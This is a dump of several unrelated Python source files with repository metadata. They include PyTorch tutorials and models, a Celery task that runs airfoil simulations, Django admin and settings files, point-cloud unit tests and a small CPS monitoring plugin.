    #amaxa2 = torch.argmax(a2).numpy()
    #print(x)
    bq.append(np.array(a2[0]))
    #print(np.array(a2[0]))
# Save the per-class backqueried input patterns.
raw = pd.DataFrame(np.array(bq))
raw.to_excel(excel_writer='bqdata/backquery_kakao.xlsx', index=None)
# for j in range(0,len(a2[0])):
#
# print('%6s' %format(np.array(a2[0][j]),'.3'),end=" ")
# print()
#print(amaxa2 - outputlen // 2)
###############################################################################
# x2 = torch.Tensor([X2[0][0]])
# z1 = torch.add(torch.mm(x2, w1ts), b1ts)
# a1 = sigmoid(z1)
# z2 = torch.add(torch.mm(a1, w2ts), b2ts)
# a2 = sigmoid(z2)
#
# amaxa2 = torch.argmax(a2).numpy()
# print(x2)
# print(amaxa2 - (outputlen - 1) / 2)
# 아웃풋 파일에 쓰기
# f.write(str(w1))
# f.write("\n")
# f.write(str(b1))
# f.write("\n")
# f.write(str(w2))
# f.write("\n")
# f.write(str(b2))
# f.write("\n")
# f.close() | [
"wjb127@naver.com"
] | wjb127@naver.com |
00c75c7761a99938db0045e90ef7b8228a83fa45 | 9c2a72534a269f7aa5f8106de0657f49112c92e3 | /upper.py | c0b16d59796da79b7395ffe4754812ead93f75a2 | [] | no_license | TonySteven/Python | 40f02d25ac3f8e3c81754828c826eb4229d6d71b | 567216212aedc546ea5583070e3664cd58046344 | refs/heads/master | 2023-08-17T20:36:07.111444 | 2023-08-07T10:13:35 | 2023-08-07T10:13:35 | 38,110,285 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# @Time : 2018/7/27 10:40
# @Author : StevenL
# @Email : stevenl365404@gmail.com
# @File : UUID.py
# Read a line and transform it: lowercase letters -> uppercase,
# spaces -> underscores, everything else unchanged.
a = input("请输入字符:")
b = []
for n in a :
    if "a"<= n <= "z":
        b.append(n.upper())
    # elif"A" <= n <= "Z" :
    #     b.append(n.lower())
    elif n == " " :
        b.append('_')
    else:
        b.append(n)
print("".join(b))
| [
"stevenl365404@gmail.com"
] | stevenl365404@gmail.com |
b1b4ec5b7ef30c526700e6d6dd317d13cb72b24e | 377ac4d28db18b3f24d4046e58564c11a0a4cb29 | /tasks.py | d21fa4d277de8991a098b176fe81bc5b9594ad7a | [] | no_license | sotchatzi/ACC-7 | 24b34d03ce58075fc56f6fd553f1e3acab3f1330 | cf51ec13975c48136b20066e0a69c4674f91e510 | refs/heads/main | 2023-01-01T01:45:31.192963 | 2020-10-23T10:58:21 | 2020-10-23T10:58:21 | 303,402,715 | 0 | 1 | null | 2020-10-20T16:45:20 | 2020-10-12T13:35:35 | Python | UTF-8 | Python | false | false | 1,327 | py | import subprocess
import pandas as pd
from glob import glob
from celery import Celery
app = Celery('tasks', broker='amqp://js:js@192.168.2.162/jsvhost', backend='redis://:js@192.168.2.162/0', task_track_started=True)
WORK_DIR = '/home/fenics/shared/murtazo'
GMSH_DIR = WORK_DIR + '/cloudnaca'
AIRFOIL_DIR = WORK_DIR + '/navier_stokes_solver'
@app.task
def test():
    """Trivial Celery task used to verify the worker is reachable."""
    return "this is a test"
@app.task
def airfoil_task(angle, n_nodes, n_levels, speed, time):
    """Generate (if needed) the NACA mesh for the given angle/resolution,
    run the airfoil solver, and return the computed lift/drag series
    together with the input parameters.

    NOTE(review): the shell commands are built by f-string interpolation
    with shell=True -- safe only while the arguments are trusted/numeric.
    """
    mesh_xml_file = f'{GMSH_DIR}/msh/r{n_levels}a{angle}n{n_nodes}.xml'
    # Build and convert the mesh only when the XML is not cached yet.
    if not glob(mesh_xml_file):
        subprocess.run(
            f'{GMSH_DIR}/runme.sh {angle} {angle} 1 {n_nodes} {n_levels}',
            shell=True, cwd=GMSH_DIR)
        subprocess.run(
            f'dolfin-convert {GMSH_DIR}/msh/r{n_levels}a{angle}n{n_nodes}.msh {mesh_xml_file}',
            shell=True, cwd=GMSH_DIR)
    subprocess.run(
        f'{AIRFOIL_DIR}/airfoil 0 0.0001 {speed} {time} {mesh_xml_file}',
        shell=True, cwd=AIRFOIL_DIR)
    # The solver writes tab-separated lift/drag columns ('drag_ligt.m'
    # is the solver's own spelling) into its results folder.
    forces = pd.read_csv(f'{AIRFOIL_DIR}/results/drag_ligt.m', sep='\t')
    return {'angle': angle, 'n_nodes': n_nodes, 'n_levels': n_levels, 'speed': speed, 'time': time,
            'lift': list(forces.lift), 'drag': list(forces.drag)}
def get_task(task_id):
    """Return the Celery AsyncResult handle for the given task id."""
    return airfoil_task.AsyncResult(task_id, app=app)
| [
"g478551654@gmail.com"
] | g478551654@gmail.com |
6576e116871b8d685309cd0229812abdd8c309f9 | 53f808dbd19355abf25fe7f000958dffa31593ce | /price/admin.py | daaf6a1e9c8c5e16ce0c40f93db02c1531de1f23 | [] | no_license | qurg/chain | f43df017d75b52c1baf43ebad913db0e881f4747 | 1a969acfe601d57ade22b912c4028ee07c82363d | refs/heads/master | 2020-05-29T21:46:11.413607 | 2019-06-14T00:55:18 | 2019-06-14T00:55:18 | 189,391,970 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,256 | py | import time
from django.contrib import admin
from django.contrib.admin import ModelAdmin
# Register your models here.
from price.adminForms import InquireForm, QuoteForm
from price.models import Inquire, Quote
class QuoteAdmin(admin.StackedInline):
    """Inline editor for Quote rows shown inside the Inquire admin page."""
    model = Quote
    form = QuoteForm
    # Field layout for the inline form, grouped per row.
    fieldsets = (
        (None, {'fields': (('supplier',),
                           ('airline', 'airline_date'),
                           ('airline_remark', 'airline_times'),
                           ('weight_class', 'cost',),
                           ('net_rate', 'fuel_rate', 'security_rate', 'truck_rate',
                            'total_rate',),
                           ('dim', 'cut_share',),
                           ('trans_route', 'trans_time',),
                           'quote_remark',
                           )}),
    )
    autocomplete_fields = ['supplier', ]
    # Do not show extra blank inline forms by default.
    extra = 0
@admin.register(Inquire)
class InquireAdmin(ModelAdmin):
    """Admin page for Inquire records with inline Quotes; stamps the
    creating user and a local-time timestamp on save."""
    form = InquireForm
    list_display = ['id', 'customer', 'depart', 'destination', 'carton', 'weight', 'volume']
    fieldsets = (
        (None, {'fields': (('customer', 'contact',),
                           ('depart', 'destination', 'cargo_ready'),
                           )}),
        ('货物信息', {'fields': (('carton', 'weight', 'volume',),
                              ('goods', 'airline_require',),
                              ('trans_time', 'remark',),
                              )}),
    )
    autocomplete_fields = ['customer', 'contact']
    inlines = [QuoteAdmin, ]
    def save_model(self, request, obj, form, change):
        """Record the creator and creation timestamp on the Inquire."""
        # NOTE(review): the field is 'create_by' here but 'created_by'
        # in save_formset below -- confirm against the model definitions.
        obj.create_by = request.user
        obj.created = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
        return super(InquireAdmin, self).save_model(request, obj, form, change)
    def save_formset(self, request, form, formset, change):
        """Stamp creator/created on inline Quote instances before saving."""
        if formset.model != Quote:
            return super(InquireAdmin, self).save_formset(request, form, formset, change)
        instances = formset.save(commit=False)
        for instance in instances:
            instance.created_by = request.user
            instance.created = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
            instance.save()
        formset.save_m2m()
| [
"qurg@outlook.com"
] | qurg@outlook.com |
f781104f0fd71fcc98d41aeec72b8325ec220ab3 | 8d0fc0a476f7de69e4dad9c7279e379eb67d3dba | /OpenGL/Geometry/PointCloudTest.py | c25b7096824f9f7ad4d57c950c1a5e088e7c4592 | [] | no_license | coderbyheart/hsrm-mi-cg | 485996c6361e4b96f149efb5120e1f5fb5ea3004 | 1c6ff5e94eb6e821798975cd970e3247a488c171 | refs/heads/master | 2021-01-23T18:49:43.876739 | 2012-01-30T16:09:41 | 2012-01-30T16:09:41 | 2,681,057 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,541 | py | # -*- coding: utf-8 -*-
import unittest
from PointCloud import PointCloud
class PointCloudTest(unittest.TestCase):
    """Unit tests for PointCloud (bounding box and normalization)."""
    def test_wuerfel5(self):
        # 5x5x5 cube anchored at the origin, extending into -z.
        pc = PointCloud()
        pc.readRaw('data/wuerfel5_points.raw')
        bb = pc.getBoundingBox()
        self.assertEqual(5.0, bb['x'])
        self.assertEqual(5.0, bb['y'])
        self.assertEqual(0.0, bb['z'])
        self.assertEqual(0.0, bb['-x'])
        self.assertEqual(0.0, bb['-y'])
        self.assertEqual(-5.0, bb['-z'])
        self.assertEqual(5.0, pc.getXSize())
        self.assertEqual(5.0, pc.getYSize())
        self.assertEqual(5.0, pc.getZSize())
    def test_wuerfel_normalize(self):
        # Every normalized cloud must fit exactly into the [-1, 1]^3 box.
        #for file in ['data/line_points.raw']:
        for file in ['data/wuerfel5_points.raw', 'data/wuerfel5-allpos_points.raw', 'data/wuerfel5-allneg_points.raw', 'data/wuerfel10_points.raw']:
            pc = PointCloud()
            pc.readRaw(file)
            pcn = pc.normalized()
            bb = pcn.getBoundingBox()
            self.assertEqual(1.0, bb['x'])
            self.assertEqual(1.0, bb['y'])
            self.assertEqual(1.0, bb['z'])
            self.assertEqual(-1.0, bb['-x'])
            self.assertEqual(-1.0, bb['-y'])
            self.assertEqual(-1.0, bb['-z'])
            self.assertEqual(2.0, pcn.getXSize())
            self.assertEqual(2.0, pcn.getYSize())
            self.assertEqual(2.0, pcn.getZSize())
# Run the test suite when executed directly.
if __name__ == '__main__':
    unittest.main()
"m@tacker.org"
] | m@tacker.org |
3efab5071a2ea200eb632218546c7f35d498b77e | 44431ab9299367df80667fc5e7b38c0dd916bf98 | /Django/mainRandomWordGenerator/mainRandomWordGenerator/settings.py | 8ca379a0bc589320e2f8cb692bb54f6835fb9728 | [] | no_license | isoetandar/DojoAssignments | 14df2b0cefe08be8f39975c6ffa1a617dfba243c | ef4e6d75b77d69ccffc0eca91e9083e6e034d4dd | refs/heads/master | 2020-03-11T15:33:04.825745 | 2018-07-06T00:41:32 | 2018-07-06T00:41:32 | 130,087,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,225 | py | """
Django settings for mainRandomWordGenerator project.
Generated by 'django-admin startproject' using Django 1.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '7j++v+jf2nd9$)%6-%a*s-2^-aetupv%jvwpnz@v1dnkxi(38v'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'apps.RWG_app',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mainRandomWordGenerator.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mainRandomWordGenerator.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
'static',
]
| [
"irwansoetandar@Irwans-MacBook-Pro.local"
] | irwansoetandar@Irwans-MacBook-Pro.local |
476e1aaa13a5d3caf85e716770bd3a375b390ac8 | 4a427ec26d3734e3c8ffa92728d36fe1b9ae200f | /torch/01-intro.py | dd037586a8dd28ea8755888e256fb322edb5d930 | [
"MIT"
] | permissive | ShixiangWang/MLnotes | 0c82a777788d3866048ab12a5d965aa18285e305 | 10ef8b0be51c3e7eb1973a30410f0501f43db21e | refs/heads/master | 2021-03-12T02:44:38.724062 | 2020-12-27T16:44:25 | 2020-12-27T16:44:25 | 246,582,973 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,172 | py | # source: https://pytorch.apachecn.org/docs/1.4/blitz/tensor_tutorial.html
# Run in R start
# BUG FIX: the two reticulate calls below are R code, not Python; left
# uncommented they made this whole file a SyntaxError.  Keep them commented
# out and run them from an R session if needed.
# reticulate::use_python("/Users/wsx/Library/r-miniconda/bin/python", required = T)
# reticulate::repl_python()
# Run in R end
from __future__ import print_function
import torch
# TENSOR ----------------------
# Empty (uninitialized) tensor
x = torch.empty(5, 3)
print(x)
# Random tensor
x = torch.rand(5, 3)
print(x)
# Zero matrix with long data type
x = torch.zeros(5, 3, dtype=torch.long)
print(x)
# Construct tensor from data
x = torch.tensor([5, 3])
print(x)
# Construct tensor based on an existing tensor
x = x.new_ones(5, 3, dtype=torch.double)    # new_* methods take in sizes
print(x)
x = torch.randn_like(x, dtype=torch.float)  # override the dtype!
print(x)                                    # result has the same size
# Shape of tensor
print(x.size())
# OPERATIONS ---------------
# addition
y = torch.rand(5, 3)
print(x + y)
print(torch.add(x, y))
result = torch.empty(5, 3)
torch.add(x, y, out=result)  # The output tensor is given
print(result)
y.add_(x)  # Add in place
print(y)
# More in-place modification functions end with '_'
# Index
print(x[:, 1])
# Change shape
x = torch.randn(4, 4)
y = x.view(16)
z = x.view(-1, 8)  # the size -1 is inferred from other dimensions
print(x.size(), y.size(), z.size())
# Transform a one-element tensor to a Python scalar
x = torch.randn(1)
print(x)
print(x.item())
# More available at <https://pytorch.org/docs/stable/torch.html>
# CONNECT to NumPy -----------------
a = torch.ones(5)
print(a)
a.numpy()
# b is a reference (shares the underlying memory with a)
b = a.numpy()
print(b)
a.add_(1)
print(a)
print(b)
# ndarray to tensor
import numpy as np
a = np.ones(5)
b = torch.from_numpy(a)
np.add(a, 1, out=a)
print(a)
print(b)
# All CPU tensors (except CharTensor) support conversion to and from NumPy.
# TENSOR in CUDA -----------------
# The following code only runs when a GPU is available.
# We use `torch.device` to move tensors onto and off of the GPU.
if torch.cuda.is_available():
    device = torch.device("cuda")          # a CUDA device object
    y = torch.ones_like(x, device=device)  # create the tensor directly on the GPU
    x = x.to(device)                       # or use the `.to("cuda")` method
    z = x + y
    print(z)
    print(z.to("cpu", torch.double))       # `.to` can also change dtype while moving
# In PyTorch, the autograd package is at the core of all neural networks.
# Here is a brief introduction before training our first network.
#
# The autograd package provides automatic differentiation for all operations
# on tensors.  It is a define-by-run framework: backpropagation is defined by
# how the code runs, and every iteration can be different.
# torch.Tensor is the core class of the package.  If its attribute
# .requires_grad is set to True, all operations on the tensor are tracked.
# After the computation finishes, calling .backward() computes all gradients
# automatically; they accumulate into the .grad attribute.
#
# To stop a tensor from tracking history, call .detach() to separate it from
# the computation history and prevent future operations from being recorded.
#
# To avoid tracking history (and using memory), wrap the code block in
# `with torch.no_grad():`.  This is especially useful when evaluating a model:
# the model may have trainable parameters with requires_grad=True, but we do
# not need their gradients during evaluation.
#
# One more class is essential to the autograd implementation: Function.
#
# Tensor and Function are interconnected and build up an acyclic graph that
# encodes the complete history of computation.  Each tensor has a .grad_fn
# attribute referencing the Function that created it (None for tensors
# created manually by the user).
#
# To compute derivatives, call .backward() on a Tensor.  If the Tensor is a
# scalar (holds a single element), backward() needs no arguments; otherwise a
# `gradient` argument with a matching shape must be supplied.
import torch
x = torch.ones(2, 2, requires_grad=True)
print(x)
| [
"wangshx@shanghaitech.edu.cn"
] | wangshx@shanghaitech.edu.cn |
8b4e5247879570909d58dd7ce8f1c75b67082f07 | 7bc8807c261adccb2e71c97e01ce48b8c13d529d | /Day_14_01_RnnJenaClimate.py | 9e47d0fdf370ad1bbe5a34b779cdaddfec9b524a | [] | no_license | yunhui21/CB_AI_3_NLP | 4e090f028123621978164ad29d9789767c1ec0b0 | 20485ce5bae472d1b63b58adf69207a2837bb96a | refs/heads/main | 2023-01-30T11:10:41.385293 | 2020-12-17T03:56:53 | 2020-12-17T03:56:53 | 309,216,161 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,821 | py | # Day_14_01_RnnJenaClimate.py
import pandas as pd
import tensorflow.compat.v1 as tf
import numpy as np
tf.disable_eager_execution()
# Problem 1
# For the 'T (degC)' column of the file, compute the mean absolute error
# using a plain linear-regression algorithm (no RNN).
# baseline model
# print('mae:', np.mean(np.abs(degc[:-144]-degc[144:])))
# Problem 2
# Compute the mean absolute error for the Jena temperature data with an RNN,
# using the columns 'p (mbar)', 'T (degC)', 'rho (g/m**3)'.
def jena_regression():
    """Baseline model: predict the temperature 144 samples (one day at
    10-minute intervals) ahead with a univariate linear regression and
    print the mean absolute error."""
    jena = pd.read_csv('data/jena_climate_2009_2016.csv', index_col=0)
    degc = jena['T (degC)'].values
    degc = degc[:1000]

    # Inputs are the current readings; targets are the readings 144 steps
    # later.  BUG FIX: the original assigned degc[:-144] to both x and y,
    # training the model to reproduce its own input instead of the future
    # value (compare the baseline: np.abs(degc[:-144] - degc[144:])).
    x, y = degc[:-144], degc[144:]

    # Scalar weight and bias, initialized from a standard normal.
    # BUG FIX: np.random.normal([1]) passed [1] as the *mean* (loc), not the
    # size; it happened to yield shape (1,) but centred the init at 1.
    w = tf.Variable(np.random.normal(size=[1]), dtype=tf.float32)
    b = tf.Variable(np.random.normal(size=[1]), dtype=tf.float32)

    hx = w * x + b

    loss_i = (hx - y) ** 2           # squared error per sample
    loss = tf.reduce_mean(loss_i)    # mean squared error

    # optimizer = tf.train.AdamOptimizer(0.1)
    optimizer = tf.train.GradientDescentOptimizer(0.001)
    train = optimizer.minimize(loss)

    sess = tf.compat.v1.Session()
    sess.run(tf.global_variables_initializer())

    for i in range(100):
        sess.run(train)
        print(i, sess.run(loss))

    preds = sess.run(hx)
    print('mae:', np.mean(np.abs(preds - y)))
    sess.close()
def rnn_jena_multi_columns():
    """Train a 2-layer RNN on three Jena climate columns (pressure, density,
    temperature) to predict the temperature 144 steps ahead, then print the
    mean absolute error over the training windows."""
    jena = pd.read_csv('data/jena_climate_2009_2016.csv', index_col=0)
    # jena = jena[['p (mbar)','T (degC)','rho (g/m**3)']].values
    # Temperature is placed last so the target can be sliced with -1 below.
    jena = [jena['p (mbar)'], jena['rho (g/m**3)'], jena['T (degC)']]
    print(np.array(jena).shape) # (420551, 3)
    jena = np.transpose(jena)
    jena = jena[:1000]
    # (420551, 3)
    # Build sliding windows: each sample is 144 consecutive rows, the target
    # is the temperature (last column) of the row right after the window.
    seq_len = 144
    rng = range(len(jena) - seq_len)
    x = [jena[s:s + seq_len] for s in rng]
    y = [jena[s + seq_len, -1:] for s in rng]
    x, y = np.float32(x), np.float32(y)
    print(x.shape, y.shape) # (568, 432, 3) (568, 3)
    hidden_size, n_features = 150, 3
    ph_x = tf.placeholder(tf.float32, shape=[None, seq_len, n_features]) #
    ph_y = tf.placeholder(tf.float32) #
    # Two stacked basic RNN cells; only the last time step feeds the dense head.
    cells = [tf.nn.rnn_cell.BasicRNNCell(num_units=hidden_size) for _ in range(2)]
    multi = tf.nn.rnn_cell.MultiRNNCell(cells)
    outputs, _states = tf.nn.dynamic_rnn(multi, ph_x, dtype=tf.float32)
    hx = tf.layers.dense(outputs[:, -1, :], 1, activation=None)
    loss_i = (hx-ph_y)**2 # mean square error
    loss = tf.reduce_mean(loss_i)
    optimizer = tf.train.AdamOptimizer(0.001)
    train = optimizer.minimize(loss)
    sess = tf.compat.v1.Session()
    sess.run(tf.global_variables_initializer())
    epochs = 10
    batch_size = 100 # number of samples processed per training step
    n_iteration = len(x) // batch_size # mini-batch iterations per epoch
    indices = np.arange(len(x)) # sequential sample indices 0 .. len(x)-1
    for i in range(epochs):
        # The raw data is a time series, but after windowing each sample is
        # self-contained, so the samples can be shuffled independently.
        np.random.shuffle(indices)
        total = 0
        for j in range(n_iteration): # split the data into batch-sized slices
            n1 = j * batch_size # 0, 100, 200, 300
            n2 = n1 + batch_size # 100, 200, 300, 400
            xx = x[indices[n1:n2]]
            yy = y[indices[n1:n2]]
            sess.run(train, {ph_x: xx, ph_y: yy})
            total += sess.run(loss, {ph_x:xx, ph_y:yy})
        print(i, total/n_iteration )
    preds = sess.run(hx, {ph_x: x})
    print(preds.shape, y.shape) #(856, 1) (856, 3)
    print('mae:', np.mean(np.abs(preds-y))) # mae: 2.612549101228096
    # with shuffling: mae: 0.74608696
    sess.close()
# Run the linear-regression baseline; the RNN experiment is left commented out.
jena_regression()
# rnn_jena_multi_columns()
"system290!"
] | system290! |
672536c5a78c1821ed185f29deec88d12a96c027 | 4a59725520ec67cd3223ca79406a5c05263b8174 | /venv/bin/numba | 88963b566e8c81ce2d2fd66c61c6b11e08fd280c | [] | no_license | cem-ergin/yapayzeka | 5dc9d9b8ed092e0c61c8de3bb1f8daf3af299b8d | 13a0e37e3d88a8588bd3c409703e3499b5f332b4 | refs/heads/master | 2020-05-24T05:26:29.324399 | 2019-05-29T16:35:25 | 2019-05-29T16:35:25 | 187,115,522 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 224 | #!/Users/cemergin/PycharmProjects/yapayzeka/venv/bin/python
# -*- coding: UTF-8 -*-
from __future__ import print_function, division, absolute_import
from numba.numba_entry import main

# Console-script shim: delegate straight to numba's CLI entry point.
if __name__ == "__main__":
    main()
| [
"cemergin@Cems-MacBook-Pro.local"
] | cemergin@Cems-MacBook-Pro.local | |
b803320c41ef1cc5d7a03074a2f5d6ec58e89096 | 2dbe308f30eb82043d3b366ffa176312b0133000 | /apps/accounts/urls.py | 123eda75119040a6bf6fc2c2c83977a7bd358c47 | [] | no_license | begalievv/food_blog | f923038f93cbe52c417e364b12872a92de91192d | 7cc32f90ba45cd25c7299920551a1d00abd26108 | refs/heads/master | 2021-02-04T22:36:12.853155 | 2020-03-11T13:18:30 | 2020-03-11T13:18:30 | 243,717,061 | 0 | 0 | null | 2020-02-28T11:56:43 | 2020-02-28T08:45:54 | CSS | UTF-8 | Python | false | false | 1,112 | py | from django.urls import path, include
from django.contrib.auth import views as auth_views
from . import views
# URL routes for the accounts app: registration and cabinet views are local,
# everything else delegates to django.contrib.auth's class-based views.
urlpatterns = [
    # path('login/', views.user_login, name='login')
    path('cabinet/', views.CabinetView.as_view(), name='cabinet'),
    path('register/', views.register, name='register'),
    path('login/', auth_views.LoginView.as_view(), name='login'),
    path('logout/', auth_views.LogoutView.as_view(), name='logout'),
    path('', views.dashboard, name='dashboard'),
    # Password change flow (requires an authenticated user).
    path('password_change/', auth_views.PasswordChangeView.as_view(), name='password_change'),
    path('password_change/done/', auth_views.PasswordChangeDoneView.as_view(), name='password_change_done'),
    # Password reset flow (via emailed token).
    path('password_reset/', auth_views.PasswordResetView.as_view(), name='password_reset'),
    path('password_reset/done/', auth_views.PasswordResetDoneView.as_view(), name='password_reset_done'),
    path('reset/<uidb64>/<token>/', auth_views.PasswordResetConfirmView.as_view(), name='password_reset_confirm'),
    path('reset/done/', auth_views.PasswordResetCompleteView.as_view(), name='password_reset_complete'),
]
| [
"begaliev0020"
] | begaliev0020 |
a8bff56768deed40c1ce40e95c7cd3fc9a647f51 | ea42b426901e76f31a97112fc147f6855c422de2 | /plugins/CPS_ALID_P1_SD5.py | b91692544c355548f03794ce0953e6c9c17d7e43 | [] | no_license | SidduSai/CPS-data-retrieval-and-manipulation | 51d426eee49ace8dd066e0bacfbc361388588e6e | d890a247ca8e12b12d07b24f56d16f7cd355b028 | refs/heads/master | 2021-07-05T20:41:02.855279 | 2017-10-01T16:48:26 | 2017-10-01T16:48:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 345 | py | from data import Pump, PLC
from data import LIT
import time
name = 'CPS_ALID_P1_SD5'
def isViolated():
    """Return True when LIT(3, 301) reports isLow while PLC(1) reports
    isNotOne, and both Pump(1, 101) and Pump(1, 102) report isOff after a
    12-second wait; False otherwise."""
    pumps = [Pump(1, 101), Pump(1, 102)]
    level_sensor = LIT(3, 301)
    plc1 = PLC(1)
    if not (level_sensor.isLow and plc1.isNotOne):
        return False
    # Give the plant time to react before sampling the pump states.
    time.sleep(12)
    return all(pump.isOff for pump in pumps)
| [
"noreply@github.com"
] | SidduSai.noreply@github.com |
2b330045f3055f985f7d6be73ed716a8c547a2b8 | a309d0b9e7a0dd23764125892d59de4911d9186c | /Sipder_origin.py | 0e60dfa0895ffafc34dbb4bbe3132401ce010811 | [] | no_license | fengx1a0/EmojiSipder | 7d8a24831ce8e025128793cf855b3e4576c938f5 | b3be463d233323f1f344eb8dd2fe23947a0d97bc | refs/heads/master | 2023-08-25T21:02:03.982817 | 2021-10-14T16:46:22 | 2021-10-14T16:46:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,083 | py | import requests
import re
import os
import time
import sys
# Browser-like User-Agent so fabiaoqing.com serves the normal HTML pages.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36"
}
def get_info(_id,page_num):
    """Scrape fabiaoqing.com tag `_id` and return (items, title), where
    items is a list of (image URL, image title) pairs gathered from up to
    `page_num` pages, and title is the tag's page title."""
    url = "https://fabiaoqing.com/tag/detail/id/%d/page/%d.html"%(_id,1)
    res = requests.get(url=url,headers=headers)
    # Each emoji thumbnail exposes its source in data-original plus a title.
    items = re.findall(r'data-original="([^"]+)" title="([^"]+)"',res.text)
    title = re.findall(r'<title>(.*?)</title>',res.text).pop().split("-").pop(0)
    # The pattern matches 200 chars preceding the "next page" link text;
    # its presence means there is more than one page of results.
    page = re.findall(r'[\S\n\s]{200}下一页',res.text)
    if page:
        # The second match's text is assumed to contain the last page number
        # right before a '<' tag boundary -- TODO confirm against live HTML.
        page = page[1].split("<").pop(0).strip()
        # Cap at page_num (note: `page` stays a str when within the cap;
        # int(page) below handles both cases).
        page = page if int(page) <= page_num else page_num
        for i in range(2,int(page)+1):
            print("Loading Page...",title,i)
            url = "https://fabiaoqing.com/tag/detail/id/%d/page/%d.html"%(_id,i)
            res = requests.get(url=url,headers=headers)
            items.extend(re.findall(r'data-original="([^"]+)" title="([^"]+)"',res.text))
    return items,title
def download(_ids, page_num):
    """Download every emoji image for tag `_ids` (up to `page_num` pages)
    into ./Database/<tag title>/, sanitizing titles into safe file names.
    Individual failures are skipped (best effort)."""
    items, title = get_info(_ids, page_num)
    title = title.strip()
    # makedirs(exist_ok=True) replaces the original's check-then-mkdir pairs,
    # which could race and which silently skipped nested creation.
    os.makedirs("./Database", exist_ok=True)
    if title:
        os.makedirs("./Database/" + title, exist_ok=True)
    for item in items:
        # Request the full-resolution variant instead of the thumbnail.
        url = item[0].replace("bmiddle", "large")
        # Strip the same characters the original removed with 13 chained
        # .replace() calls: / \ * : ? > < " ' | . and CR/LF, then whitespace.
        filename = re.sub(r'[/\\*:?><"\'|.\n\r]', '', item[1]).strip()
        try:
            req = requests.get(url, headers=headers, timeout=3)
            if req.status_code != 200:
                continue
            # BUG FIX: original message read "Staring Download...".
            print("Starting Download...", filename)
            with open("./Database/" + title + "/" + filename + '.jpg', "wb") as fs:
                fs.write(req.content)
        except Exception:
            # Best effort: skip images that time out or fail to save.
            # Narrowed from the original bare `except:`, which also swallowed
            # KeyboardInterrupt and SystemExit.
            pass
def main(depth, page_num):
    """Download every tag id in [1, depth), at most page_num pages each."""
    for tag_id in range(1, depth):
        download(tag_id, page_num)
if __name__ == '__main__':
    print("data will saved into folder `./Database`")
    # CLI: <script> DEPTH MAX_PAGE_NUM_OF_EACH
    # NOTE(review): the usage text names 'fidder.py'/'fiddle.py' while the
    # file is Sipder_origin.py -- confirm the intended script name.
    if len(sys.argv) != 3:
        exit("Invaild Option:\n\npython fidder.py DEPTH MAX_PAGE_NUM_OF_EACH\n\nExample: python fiddle.py 10 10")
    main(int(sys.argv[1]), int(sys.argv[2]))
"m16605296117@163.com"
] | m16605296117@163.com |
4a21840fb38bac5c76ca8f9866e2127559e177c1 | a4a236c776b7c51ee0022fbf9e40296047f3fbb2 | /ll_roman_to_int.py | d176d68c48077af86e36e3a94db1672b503ac094 | [] | no_license | NataliyaPavlova/LeetCode | 28349b4e4b8f08524b462fefc385c0c781cf447a | 2ee1d892ab7cc24804e22f653b6641562de637cf | refs/heads/master | 2020-04-04T17:17:23.663085 | 2019-01-25T08:58:09 | 2019-01-25T08:58:09 | 156,114,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 965 | py | '''
